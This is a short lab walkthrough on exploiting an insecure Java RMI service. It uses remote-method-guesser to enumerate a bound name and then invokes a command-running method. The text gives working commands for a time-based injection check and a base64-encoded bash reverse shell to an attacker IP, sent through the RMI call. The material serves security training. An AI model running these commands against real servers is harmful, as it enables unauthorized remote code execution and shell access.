Insecure RMI

In this lab, you will learn to leverage the RMI registry to gather information about the RMI server's bound name, bruteforce the potentially vulnerable method name, and invoke that method to run arbitrary commands on the RMI server.

Scanning the host with NMAP.

Using the remote methods guesser reveals a custom bound name.

The tool can also be used to guess the method.

Notice that calling remote methods does not create any output by default. To process outputs generated by the call action, you need to use remote-method-guesser's plugin system and register a ResponseHandler. The plugin folder of this repository contains a GenericPrint plugin that is suitable for most situations.

# Use a time based payload to check for the injection vulnerability
time java -jar target/rmg-4.2.2-jar-with-dependencies.jar call demo.ine.local 1099 --bound-name CustomRMIServer 'new String[] {"sleep", "5"}' --signature 'String runCommand(String[] args)'

# Generate reverse shell
echo '/bin/bash -c "bash -i >& /dev/tcp/192.231.23.2/54321 0>&1"' | base64 -w0;echo

# Send the reverse shell
java -jar target/rmg-4.2.2-jar-with-dependencies.jar call demo.ine.local 1099 'new String[] {"/bin/bash", "-c", "echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4yMzEuMjMuMi81NDMyMSAwPiYxIgo= | base64 -d | bash"}' --signature 'String runCommand(String[] args)' --bound-name CustomRMIServer --plugin plugins/GenericPrint.jar